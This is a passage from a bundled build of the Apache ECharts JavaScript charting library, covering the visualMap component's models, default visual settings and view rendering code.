setVisual(key, value) {\n        resultVisual[key] = value;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @file Visual mapping.\n */\n\nvar visualDefault = {\n\n    /**\n     * @public\n     */\n    get: function (visualType, key, isCategory) {\n        var value = clone(\n            (defaultOption$3[visualType] || {})[key]\n        );\n\n        return isCategory\n            ? (isArray(value) ? value[value.length - 1] : value)\n            : value;\n    }\n\n};\n\nvar defaultOption$3 = {\n\n    color: {\n        active: ['#006edd', '#e0ffff'],\n        inactive: ['rgba(0,0,0,0)']\n    },\n\n    colorHue: {\n        active: [0, 360],\n        inactive: [0, 0]\n    },\n\n    colorSaturation: {\n        active: [0.3, 1],\n        inactive: [0, 0]\n    },\n\n    colorLightness: {\n        active: [0.9, 0.5],\n        inactive: [0, 0]\n    },\n\n    colorAlpha: {\n        active: [0.3, 1],\n        inactive: [0, 0]\n    },\n\n    opacity: {\n        active: [0.3, 1],\n        inactive: [0, 0]\n    },\n\n    symbol: {\n        active: ['circle', 'roundRect', 'diamond'],\n        inactive: ['none']\n    },\n\n    symbolSize: {\n        active: [10, 50],\n        inactive: [0, 0]\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar mapVisual$2 = VisualMapping.mapVisual;\nvar eachVisual = VisualMapping.eachVisual;\nvar isArray$3 = isArray;\nvar each$28 = each$1;\nvar asc$3 = asc;\nvar linearMap$2 = linearMap;\nvar noop$2 = noop;\n\nvar VisualMapModel = extendComponentModel({\n\n    type: 'visualMap',\n\n    dependencies: ['series'],\n\n    /**\n     * @readOnly\n     * @type {Array.<string>}\n     */\n    stateList: ['inRange', 'outOfRange'],\n\n    /**\n     * @readOnly\n     * @type {Array.<string>}\n     */\n    replacableOptionKeys: [\n        'inRange', 'outOfRange', 'target', 'controller', 'color'\n    ],\n\n    /**\n     * [lowerBound, upperBound]\n     *\n     * @readOnly\n     * @type {Array.<number>}\n     */\n    dataBound: [-Infinity, Infinity],\n\n    /**\n     * @readOnly\n     * @type {string|Object}\n     */\n    layoutMode: {type: 'box', ignoreSize: true},\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        show: true,\n\n        zlevel: 0,\n        z: 4,\n\n        seriesIndex: 'all',     // 'all' or null/undefined: all series.\n                                // A number or an array of number: the specified series.\n\n                                // set min: 0, max: 200, only for campatible with ec2.\n                                // In fact min max should not have default value.\n        min: 0,                 // min value, must specified if pieces is not specified.\n        max: 200,               // max value, must specified if pieces is not specified.\n\n        dimension: null,\n        inRange: null,          // 'color', 'colorHue', 'colorSaturation', 'colorLightness', 'colorAlpha',\n                                // 'symbol', 'symbolSize'\n        outOfRange: null,       // 'color', 'colorHue', 'colorSaturation',\n                                // 'colorLightness', 'colorAlpha',\n                                // 'symbol', 'symbolSize'\n\n        left: 0,                // 'center' ¦ 'left' ¦ 'right' ¦ {number} (px)\n        right: null,            // The same as left.\n        top: null,              // 'top' ¦ 'bottom' ¦ 'center' ¦ {number} (px)\n        bottom: 0,              // The same as top.\n\n        itemWidth: null,\n        itemHeight: null,\n        inverse: false,\n        orient: 'vertical',        // 'horizontal' ¦ 'vertical'\n\n        backgroundColor: 'rgba(0,0,0,0)',\n        borderColor: '#ccc',       // 值域边框颜色\n        contentColor: '#5793f3',\n        inactiveColor: '#aaa',\n        borderWidth: 0,            // 值域边框线宽，单位px，默认为0（无边框）\n        padding: 5,                // 值域内边距，单位px，默认各方向内边距为5，\n                                    // 接受数组分别设定上右下左边距，同css\n        textGap: 10,               //\n        precision: 0,              // 小数精度，默认为0，无小数点\n        color: null,               //颜色（deprecated，兼容ec2，顺序同pieces，不同于inRange/outOfRange）\n\n        formatter: null,\n        text: null,                // 文本，如['高', '低']，兼容ec2，text[0]对应高值，text[1]对应低值\n        textStyle: {\n            color: '#333'          // 值域文字颜色\n        }\n    },\n\n    /**\n     * @protected\n     */\n    init: function (option, parentModel, ecModel) {\n\n        /**\n         * @private\n         * @type {Array.<number>}\n         */\n        this._dataExtent;\n\n        /**\n         * @readOnly\n         */\n        this.targetVisuals = {};\n\n        /**\n         * @readOnly\n         */\n        this.controllerVisuals = {};\n\n        /**\n         * @readOnly\n         */\n        this.textStyleModel;\n\n        /**\n         * [width, height]\n         * @readOnly\n         * @type {Array.<number>}\n         */\n        this.itemSize;\n\n        this.mergeDefaultAndTheme(option, ecModel);\n    },\n\n    /**\n     * @protected\n     */\n    optionUpdated: function (newOption, isInit) {\n        var thisOption = this.option;\n\n        // FIXME\n        // necessary?\n        // Disable realtime view update if canvas is not supported.\n        if (!env$1.canvasSupported) {\n            thisOption.realtime = false;\n        }\n\n        !isInit && replaceVisualOption(\n            thisOption, newOption, this.replacableOptionKeys\n        );\n\n        this.textStyleModel = this.getModel('textStyle');\n\n        this.resetItemSize();\n\n        this.completeVisualOption();\n    },\n\n    /**\n     * @protected\n     */\n    resetVisual: function (supplementVisualOption) {\n        var stateList = this.stateList;\n        supplementVisualOption = bind(supplementVisualOption, this);\n\n        this.controllerVisuals = createVisualMappings(\n            this.option.controller, stateList, supplementVisualOption\n        );\n        this.targetVisuals = createVisualMappings(\n            this.option.target, stateList, supplementVisualOption\n        );\n    },\n\n    /**\n     * @protected\n     * @return {Array.<number>} An array of series indices.\n     */\n    getTargetSeriesIndices: function () {\n        var optionSeriesIndex = this.option.seriesIndex;\n        var seriesIndices = [];\n\n        if (optionSeriesIndex == null || optionSeriesIndex === 'all') {\n            this.ecModel.eachSeries(function (seriesModel, index) {\n                seriesIndices.push(index);\n            });\n        }\n        else {\n            seriesIndices = normalizeToArray(optionSeriesIndex);\n        }\n\n        return seriesIndices;\n    },\n\n    /**\n     * @public\n     */\n    eachTargetSeries: function (callback, context) {\n        each$1(this.getTargetSeriesIndices(), function (seriesIndex) {\n            callback.call(context, this.ecModel.getSeriesByIndex(seriesIndex));\n        }, this);\n    },\n\n    /**\n     * @pubilc\n     */\n    isTargetSeries: function (seriesModel) {\n        var is = false;\n        this.eachTargetSeries(function (model) {\n            model === seriesModel && (is = true);\n        });\n        return is;\n    },\n\n    /**\n     * @example\n     * this.formatValueText(someVal); // format single numeric value to text.\n     * this.formatValueText(someVal, true); // format single category value to text.\n     * this.formatValueText([min, max]); // format numeric min-max to text.\n     * this.formatValueText([this.dataBound[0], max]); // using data lower bound.\n     * this.formatValueText([min, this.dataBound[1]]); // using data upper bound.\n     *\n     * @param {number|Array.<number>} value Real value, or this.dataBound[0 or 1].\n     * @param {boolean} [isCategory=false] Only available when value is number.\n     * @param {Array.<string>} edgeSymbols Open-close symbol when value is interval.\n     * @return {string}\n     * @protected\n     */\n    formatValueText: function (value, isCategory, edgeSymbols) {\n        var option = this.option;\n        var precision = option.precision;\n        var dataBound = this.dataBound;\n        var formatter = option.formatter;\n        var isMinMax;\n        var textValue;\n        edgeSymbols = edgeSymbols || ['<', '>'];\n\n        if (isArray(value)) {\n            value = value.slice();\n            isMinMax = true;\n        }\n\n        textValue = isCategory\n            ? value\n            : (isMinMax\n                ? [toFixed(value[0]), toFixed(value[1])]\n                : toFixed(value)\n            );\n\n        if (isString(formatter)) {\n            return formatter\n                .replace('{value}', isMinMax ? textValue[0] : textValue)\n                .replace('{value2}', isMinMax ? textValue[1] : textValue);\n        }\n        else if (isFunction$1(formatter)) {\n            return isMinMax\n                ? formatter(value[0], value[1])\n                : formatter(value);\n        }\n\n        if (isMinMax) {\n            if (value[0] === dataBound[0]) {\n                return edgeSymbols[0] + ' ' + textValue[1];\n            }\n            else if (value[1] === dataBound[1]) {\n                return edgeSymbols[1] + ' ' + textValue[0];\n            }\n            else {\n                return textValue[0] + ' - ' + textValue[1];\n            }\n        }\n        else { // Format single value (includes category case).\n            return textValue;\n        }\n\n        function toFixed(val) {\n            return val === dataBound[0]\n                ? 'min'\n                : val === dataBound[1]\n                ? 'max'\n                : (+val).toFixed(Math.min(precision, 20));\n        }\n    },\n\n    /**\n     * @protected\n     */\n    resetExtent: function () {\n        var thisOption = this.option;\n\n        // Can not calculate data extent by data here.\n        // Because series and data may be modified in processing stage.\n        // So we do not support the feature \"auto min/max\".\n\n        var extent = asc$3([thisOption.min, thisOption.max]);\n\n        this._dataExtent = extent;\n    },\n\n    /**\n     * @public\n     * @param {module:echarts/data/List} list\n     * @return {string} Concrete dimention. If return null/undefined,\n     *                  no dimension used.\n     */\n    getDataDimension: function (list) {\n        var optDim = this.option.dimension;\n        var listDimensions = list.dimensions;\n        if (optDim == null && !listDimensions.length) {\n            return;\n        }\n\n        if (optDim != null) {\n            return list.getDimension(optDim);\n        }\n\n        var dimNames = list.dimensions;\n        for (var i = dimNames.length - 1; i >= 0; i--) {\n            var dimName = dimNames[i];\n            var dimInfo = list.getDimensionInfo(dimName);\n            if (!dimInfo.isCalculationCoord) {\n                return dimName;\n            }\n        }\n    },\n\n    /**\n     * @public\n     * @override\n     */\n    getExtent: function () {\n        return this._dataExtent.slice();\n    },\n\n    /**\n     * @protected\n     */\n    completeVisualOption: function () {\n        var ecModel = this.ecModel;\n        var thisOption = this.option;\n        var base = {inRange: thisOption.inRange, outOfRange: thisOption.outOfRange};\n\n        var target = thisOption.target || (thisOption.target = {});\n        var controller = thisOption.controller || (thisOption.controller = {});\n\n        merge(target, base); // Do not override\n        merge(controller, base); // Do not override\n\n        var isCategory = this.isCategory();\n\n        completeSingle.call(this, target);\n        completeSingle.call(this, controller);\n        completeInactive.call(this, target, 'inRange', 'outOfRange');\n        // completeInactive.call(this, target, 'outOfRange', 'inRange');\n        completeController.call(this, controller);\n\n        function completeSingle(base) {\n            // Compatible with ec2 dataRange.color.\n            // The mapping order of dataRange.color is: [high value, ..., low value]\n            // whereas inRange.color and outOfRange.color is [low value, ..., high value]\n            // Notice: ec2 has no inverse.\n            if (isArray$3(thisOption.color)\n                // If there has been inRange: {symbol: ...}, adding color is a mistake.\n                // So adding color only when no inRange defined.\n                && !base.inRange\n            ) {\n                base.inRange = {color: thisOption.color.slice().reverse()};\n            }\n\n            // Compatible with previous logic, always give a defautl color, otherwise\n            // simple config with no inRange and outOfRange will not work.\n            // Originally we use visualMap.color as the default color, but setOption at\n            // the second time the default color will be erased. So we change to use\n            // constant DEFAULT_COLOR.\n            // If user do not want the defualt color, set inRange: {color: null}.\n            base.inRange = base.inRange || {color: ecModel.get('gradientColor')};\n\n            // If using shortcut like: {inRange: 'symbol'}, complete default value.\n            each$28(this.stateList, function (state) {\n                var visualType = base[state];\n\n                if (isString(visualType)) {\n                    var defa = visualDefault.get(visualType, 'active', isCategory);\n                    if (defa) {\n                        base[state] = {};\n                        base[state][visualType] = defa;\n                    }\n                    else {\n                        // Mark as not specified.\n                        delete base[state];\n                    }\n                }\n            }, this);\n        }\n\n        function completeInactive(base, stateExist, stateAbsent) {\n            var optExist = base[stateExist];\n            var optAbsent = base[stateAbsent];\n\n            if (optExist && !optAbsent) {\n                optAbsent = base[stateAbsent] = {};\n                each$28(optExist, function (visualData, visualType) {\n                    if (!VisualMapping.isValidType(visualType)) {\n                        return;\n                    }\n\n                    var defa = visualDefault.get(visualType, 'inactive', isCategory);\n\n                    if (defa != null) {\n                        optAbsent[visualType] = defa;\n\n                        // Compatibable with ec2:\n                        // Only inactive color to rgba(0,0,0,0) can not\n                        // make label transparent, so use opacity also.\n                        if (visualType === 'color'\n                            && !optAbsent.hasOwnProperty('opacity')\n                            && !optAbsent.hasOwnProperty('colorAlpha')\n                        ) {\n                            optAbsent.opacity = [0, 0];\n                        }\n                    }\n                });\n            }\n        }\n\n        function completeController(controller) {\n            var symbolExists = (controller.inRange || {}).symbol\n                || (controller.outOfRange || {}).symbol;\n            var symbolSizeExists = (controller.inRange || {}).symbolSize\n                || (controller.outOfRange || {}).symbolSize;\n            var inactiveColor = this.get('inactiveColor');\n\n            each$28(this.stateList, function (state) {\n\n                var itemSize = this.itemSize;\n                var visuals = controller[state];\n\n                // Set inactive color for controller if no other color\n                // attr (like colorAlpha) specified.\n                if (!visuals) {\n                    visuals = controller[state] = {\n                        color: isCategory ? inactiveColor : [inactiveColor]\n                    };\n                }\n\n                // Consistent symbol and symbolSize if not specified.\n                if (visuals.symbol == null) {\n                    visuals.symbol = symbolExists\n                        && clone(symbolExists)\n                        || (isCategory ? 'roundRect' : ['roundRect']);\n                }\n                if (visuals.symbolSize == null) {\n                    visuals.symbolSize = symbolSizeExists\n                        && clone(symbolSizeExists)\n                        || (isCategory ? itemSize[0] : [itemSize[0], itemSize[0]]);\n                }\n\n                // Filter square and none.\n                visuals.symbol = mapVisual$2(visuals.symbol, function (symbol) {\n                    return (symbol === 'none' || symbol === 'square') ? 'roundRect' : symbol;\n                });\n\n                // Normalize symbolSize\n                var symbolSize = visuals.symbolSize;\n\n                if (symbolSize != null) {\n                    var max = -Infinity;\n                    // symbolSize can be object when categories defined.\n                    eachVisual(symbolSize, function (value) {\n                        value > max && (max = value);\n                    });\n                    visuals.symbolSize = mapVisual$2(symbolSize, function (value) {\n                        return linearMap$2(value, [0, max], [0, itemSize[0]], true);\n                    });\n                }\n\n            }, this);\n        }\n    },\n\n    /**\n     * @protected\n     */\n    resetItemSize: function () {\n        this.itemSize = [\n            parseFloat(this.get('itemWidth')),\n            parseFloat(this.get('itemHeight'))\n        ];\n    },\n\n    /**\n     * @public\n     */\n    isCategory: function () {\n        return !!this.option.categories;\n    },\n\n    /**\n     * @public\n     * @abstract\n     */\n    setSelected: noop$2,\n\n    /**\n     * @public\n     * @abstract\n     * @param {*|module:echarts/data/List} valueOrData\n     * @param {number} dataIndex\n     * @return {string} state See this.stateList\n     */\n    getValueState: noop$2,\n\n    /**\n     * FIXME\n     * Do not publish to thirt-part-dev temporarily\n     * util the interface is stable. (Should it return\n     * a function but not visual meta?)\n     *\n     * @pubilc\n     * @abstract\n     * @param {Function} getColorVisual\n     *        params: value, valueState\n     *        return: color\n     * @return {Object} visualMeta\n     *        should includes {stops, outerColors}\n     *        outerColor means [colorBeyondMinValue, colorBeyondMaxValue]\n     */\n    getVisualMeta: noop$2\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Constant\nvar DEFAULT_BAR_BOUND = [20, 140];\n\nvar ContinuousModel = VisualMapModel.extend({\n\n    type: 'visualMap.continuous',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        align: 'auto',           // 'auto', 'left', 'right', 'top', 'bottom'\n        calculable: false,       // This prop effect default component type determine,\n                                 // See echarts/component/visualMap/typeDefaulter.\n        range: null,             // selected range. In default case `range` is [min, max]\n                                 // and can auto change along with modification of min max,\n                                 // util use specifid a range.\n        realtime: true,          // Whether realtime update.\n        itemHeight: null,        // The length of the range control edge.\n        itemWidth: null,         // The length of the other side.\n        hoverLink: true,         // Enable hover highlight.\n        hoverLinkDataSize: null, // The size of hovered data.\n        hoverLinkOnHandle: null  // Whether trigger hoverLink when hover handle.\n                                 // If not specified, follow the value of `realtime`.\n    },\n\n    /**\n     * @override\n     */\n    optionUpdated: function (newOption, isInit) {\n        ContinuousModel.superApply(this, 'optionUpdated', arguments);\n\n        this.resetExtent();\n\n        this.resetVisual(function (mappingOption) {\n            mappingOption.mappingMethod = 'linear';\n            mappingOption.dataExtent = this.getExtent();\n        });\n\n        this._resetRange();\n    },\n\n    /**\n     * @protected\n     * @override\n     */\n    resetItemSize: function () {\n        ContinuousModel.superApply(this, 'resetItemSize', arguments);\n\n        var itemSize = this.itemSize;\n\n        this._orient === 'horizontal' && itemSize.reverse();\n\n        (itemSize[0] == null || isNaN(itemSize[0])) && (itemSize[0] = DEFAULT_BAR_BOUND[0]);\n        (itemSize[1] == null || isNaN(itemSize[1])) && (itemSize[1] = DEFAULT_BAR_BOUND[1]);\n    },\n\n    /**\n     * @private\n     */\n    _resetRange: function () {\n        var dataExtent = this.getExtent();\n        var range = this.option.range;\n\n        if (!range || range.auto) {\n            // `range` should always be array (so we dont use other\n            // value like 'auto') for user-friend. (consider getOption).\n            dataExtent.auto = 1;\n            this.option.range = dataExtent;\n        }\n        else if (isArray(range)) {\n            if (range[0] > range[1]) {\n                range.reverse();\n            }\n            range[0] = Math.max(range[0], dataExtent[0]);\n            range[1] = Math.min(range[1], dataExtent[1]);\n        }\n    },\n\n    /**\n     * @protected\n     * @override\n     */\n    completeVisualOption: function () {\n        VisualMapModel.prototype.completeVisualOption.apply(this, arguments);\n\n        each$1(this.stateList, function (state) {\n            var symbolSize = this.option.controller[state].symbolSize;\n            if (symbolSize && symbolSize[0] !== symbolSize[1]) {\n                symbolSize[0] = 0; // For good looking.\n            }\n        }, this);\n    },\n\n    /**\n     * @override\n     */\n    setSelected: function (selected) {\n        this.option.range = selected.slice();\n        this._resetRange();\n    },\n\n    /**\n     * @public\n     */\n    getSelected: function () {\n        var dataExtent = this.getExtent();\n\n        var dataInterval = asc(\n            (this.get('range') || []).slice()\n        );\n\n        // Clamp\n        dataInterval[0] > dataExtent[1] && (dataInterval[0] = dataExtent[1]);\n        dataInterval[1] > dataExtent[1] && (dataInterval[1] = dataExtent[1]);\n        dataInterval[0] < dataExtent[0] && (dataInterval[0] = dataExtent[0]);\n        dataInterval[1] < dataExtent[0] && (dataInterval[1] = dataExtent[0]);\n\n        return dataInterval;\n    },\n\n    /**\n     * @override\n     */\n    getValueState: function (value) {\n        var range = this.option.range;\n        var dataExtent = this.getExtent();\n\n        // When range[0] === dataExtent[0], any value larger than dataExtent[0] maps to 'inRange'.\n        // range[1] is processed likewise.\n        return (\n            (range[0] <= dataExtent[0] || range[0] <= value)\n            && (range[1] >= dataExtent[1] || value <= range[1])\n        ) ? 'inRange' : 'outOfRange';\n    },\n\n    /**\n     * @params {Array.<number>} range target value: range[0] <= value && value <= range[1]\n     * @return {Array.<Object>} [{seriesId, dataIndices: <Array.<number>>}, ...]\n     */\n    findTargetDataIndices: function (range) {\n        var result = [];\n\n        this.eachTargetSeries(function (seriesModel) {\n            var dataIndices = [];\n            var data = seriesModel.getData();\n\n            data.each(this.getDataDimension(data), function (value, dataIndex) {\n                range[0] <= value && value <= range[1] && dataIndices.push(dataIndex);\n            }, this);\n\n            result.push({seriesId: seriesModel.id, dataIndex: dataIndices});\n        }, this);\n\n        return result;\n    },\n\n    /**\n     * @implement\n     */\n    getVisualMeta: function (getColorVisual) {\n        var oVals = getColorStopValues(this, 'outOfRange', this.getExtent());\n        var iVals = getColorStopValues(this, 'inRange', this.option.range.slice());\n        var stops = [];\n\n        function setStop(value, valueState) {\n            stops.push({\n                value: value,\n                color: getColorVisual(value, valueState)\n            });\n        }\n\n        // Format to: outOfRange -- inRange -- outOfRange.\n        var iIdx = 0;\n        var oIdx = 0;\n        var iLen = iVals.length;\n        var oLen = oVals.length;\n\n        for (; oIdx < oLen && (!iVals.length || oVals[oIdx] <= iVals[0]); oIdx++) {\n            // If oVal[oIdx] === iVals[iIdx], oVal[oIdx] should be ignored.\n            if (oVals[oIdx] < iVals[iIdx]) {\n                setStop(oVals[oIdx], 'outOfRange');\n            }\n        }\n        for (var first = 1; iIdx < iLen; iIdx++, first = 0) {\n            // If range is full, value beyond min, max will be clamped.\n            // make a singularity\n            first && stops.length && setStop(iVals[iIdx], 'outOfRange');\n            setStop(iVals[iIdx], 'inRange');\n        }\n        for (var first = 1; oIdx < oLen; oIdx++) {\n            if (!iVals.length || iVals[iVals.length - 1] < oVals[oIdx]) {\n                // make a singularity\n                if (first) {\n                    stops.length && setStop(stops[stops.length - 1].value, 'outOfRange');\n                    first = 0;\n                }\n                setStop(oVals[oIdx], 'outOfRange');\n            }\n        }\n\n        var stopsLen = stops.length;\n\n        return {\n            stops: stops,\n            outerColors: [\n                stopsLen ? stops[0].color : 'transparent',\n                stopsLen ? stops[stopsLen - 1].color : 'transparent'\n            ]\n        };\n    }\n\n});\n\nfunction getColorStopValues(visualMapModel, valueState, dataExtent) {\n    if (dataExtent[0] === dataExtent[1]) {\n        return dataExtent.slice();\n    }\n\n    // When using colorHue mapping, it is not linear color any more.\n    // Moreover, canvas gradient seems not to be accurate linear.\n    // FIXME\n    // Should be arbitrary value 100? or based on pixel size?\n    var count = 200;\n    var step = (dataExtent[1] - dataExtent[0]) / count;\n\n    var value = dataExtent[0];\n    var stopValues = [];\n    for (var i = 0; i <= count && value < dataExtent[1]; i++) {\n        stopValues.push(value);\n        value += step;\n    }\n    stopValues.push(dataExtent[1]);\n\n    return stopValues;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar VisualMapView = extendComponentView({\n\n    type: 'visualMap',\n\n    /**\n     * @readOnly\n     * @type {Object}\n     */\n    autoPositionValues: {left: 1, right: 1, top: 1, bottom: 1},\n\n    init: function (ecModel, api) {\n        /**\n         * @readOnly\n         * @type {module:echarts/model/Global}\n         */\n        this.ecModel = ecModel;\n\n        /**\n         * @readOnly\n         * @type {module:echarts/ExtensionAPI}\n         */\n        this.api = api;\n\n        /**\n         * @readOnly\n         * @type {module:echarts/component/visualMap/visualMapModel}\n         */\n        this.visualMapModel;\n    },\n\n    /**\n     * @protected\n     */\n    render: function (visualMapModel, ecModel, api, payload) {\n        this.visualMapModel = visualMapModel;\n\n        if (visualMapModel.get('show') === false) {\n            this.group.removeAll();\n            return;\n        }\n\n        this.doRender.apply(this, arguments);\n    },\n\n    /**\n     * @protected\n     */\n    renderBackground: function (group) {\n        var visualMapModel = this.visualMapModel;\n        var padding = normalizeCssArray$1(visualMapModel.get('padding') || 0);\n        var rect = group.getBoundingRect();\n\n        group.add(new Rect({\n            z2: -1, // Lay background rect on the lowest layer.\n            silent: true,\n            shape: {\n                x: rect.x - padding[3],\n                y: rect.y - padding[0],\n                width: rect.width + padding[3] + padding[1],\n                height: rect.height + padding[0] + padding[2]\n            },\n            style: {\n                fill: visualMapModel.get('backgroundColor'),\n                stroke: visualMapModel.get('borderColor'),\n                lineWidth: visualMapModel.get('borderWidth')\n            }\n        }));\n    },\n\n    /**\n     * @protected\n     * @param {number} targetValue can be Infinity or -Infinity\n     * @param {string=} visualCluster Only can be 'color' 'opacity' 'symbol' 'symbolSize'\n     * @param {Object} [opts]\n     * @param {string=} [opts.forceState] Specify state, instead of using getValueState method.\n     * @param {string=} [opts.convertOpacityToAlpha=false] For color gradient in controller widget.\n     * @return {*} Visual value.\n     */\n    getControllerVisual: function (targetValue, visualCluster, opts) {\n        opts = opts || {};\n\n        var forceState = opts.forceState;\n        var visualMapModel = this.visualMapModel;\n        var visualObj = {};\n\n        // Default values.\n        if (visualCluster === 'symbol') {\n            visualObj.symbol = visualMapModel.get('itemSymbol');\n        }\n        if (visualCluster === 'color') {\n            var defaultColor = visualMapModel.get('contentColor');\n            visualObj.color = defaultColor;\n        }\n\n        function getter(key) {\n            return visualObj[key];\n        }\n\n        function setter(key, value) {\n            visualObj[key] = value;\n        }\n\n        var mappings = visualMapModel.controllerVisuals[\n            forceState || visualMapModel.getValueState(targetValue)\n        ];\n        var visualTypes = VisualMapping.prepareVisualTypes(mappings);\n\n        each$1(visualTypes, function (type) {\n            var visualMapping = mappings[type];\n            if (opts.convertOpacityToAlpha && type === 'opacity') {\n                type = 'colorAlpha';\n                visualMapping = mappings.__alphaForOpacity;\n            }\n            if (VisualMapping.dependsOn(type, visualCluster)) {\n                visualMapping && visualMapping.applyVisual(\n                    targetValue, getter, setter\n                );\n            }\n        });\n\n        return visualObj[visualCluster];\n    },\n\n    /**\n     * @protected\n     */\n    positionGroup: function (group) {\n        var model = this.visualMapModel;\n        var api = this.api;\n\n        positionElement(\n            group,\n            model.getBoxLayoutParams(),\n            {width: api.getWidth(), height: api.getHeight()}\n        );\n    },\n\n    /**\n     * @protected\n     * @abstract\n     */\n    doRender: noop\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/component/visualMap/VisualMapModel} visualMapModel\\\n * @param {module:echarts/ExtensionAPI} api\n * @param {Array.<number>} itemSize always [short, long]\n * @return {string} 'left' or 'right' or 'top' or 'bottom'\n */\nfunction getItemAlign(visualMapModel, api, itemSize) {\n    var modelOption = visualMapModel.option;\n    var itemAlign = modelOption.align;\n\n    if (itemAlign != null && itemAlign !== 'auto') {\n        return itemAlign;\n    }\n\n    // Auto decision align.\n    var ecSize = {width: api.getWidth(), height: api.getHeight()};\n    var realIndex = modelOption.orient === 'horizontal' ? 1 : 0;\n\n    var paramsSet = [\n        ['left', 'right', 'width'],\n        ['top', 'bottom', 'height']\n    ];\n    var reals = paramsSet[realIndex];\n    var fakeValue = [0, null, 10];\n\n    var layoutInput = {};\n    for (var i = 0; i < 3; i++) {\n        layoutInput[paramsSet[1 - realIndex][i]] = fakeValue[i];\n        layoutInput[reals[i]] = i === 2 ? itemSize[0] : modelOption[reals[i]];\n    }\n\n    var rParam = [['x', 'width', 3], ['y', 'height', 0]][realIndex];\n    var rect = getLayoutRect(layoutInput, ecSize, modelOption.padding);\n\n    return reals[\n        (rect.margin[rParam[2]] || 0) + rect[rParam[0]] + rect[rParam[1]] * 0.5\n            < ecSize[rParam[1]] * 0.5 ? 0 : 1\n    ];\n}\n\n/**\n * Prepare dataIndex for outside usage, where dataIndex means rawIndex, and\n * dataIndexInside means filtered index.\n */\nfunction makeHighDownBatch(batch, visualMapModel) {\n    each$1(batch || [], function (batchItem) {\n        if (batchItem.dataIndex != null) {\n            batchItem.dataIndexInside = batchItem.dataIndex;\n            batchItem.dataIndex = null;\n        }\n        batchItem.highlightKey = 'visualMap' + (visualMapModel ? visualMapModel.componentIndex : '');\n    });\n    return batch;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar linearMap$3 = linearMap;\nvar each$29 = each$1;\nvar mathMin$8 = Math.min;\nvar mathMax$8 = Math.max;\n\n// Arbitrary value\nvar HOVER_LINK_SIZE = 12;\nvar HOVER_LINK_OUT = 6;\n\n// Notice:\n// Any \"interval\" should be by the order of [low, high].\n// \"handle0\" (handleIndex === 0) maps to\n// low data value: this._dataInterval[0] and has low coord.\n// \"handle1\" (handleIndex === 1) maps to\n// high data value: this._dataInterval[1] and has high coord.\n// The logic of transform is implemented in this._createBarGroup.\n\nvar ContinuousView = VisualMapView.extend({\n\n    type: 'visualMap.continuous',\n\n    /**\n     * @override\n     */\n    init: function () {\n\n        ContinuousView.superApply(this, 'init', arguments);\n\n        /**\n         * @private\n         */\n        this._shapes = {};\n\n        /**\n         * @private\n         */\n        this._dataInterval = [];\n\n        /**\n         * @private\n         */\n        this._handleEnds = [];\n\n        /**\n         * @private\n         */\n        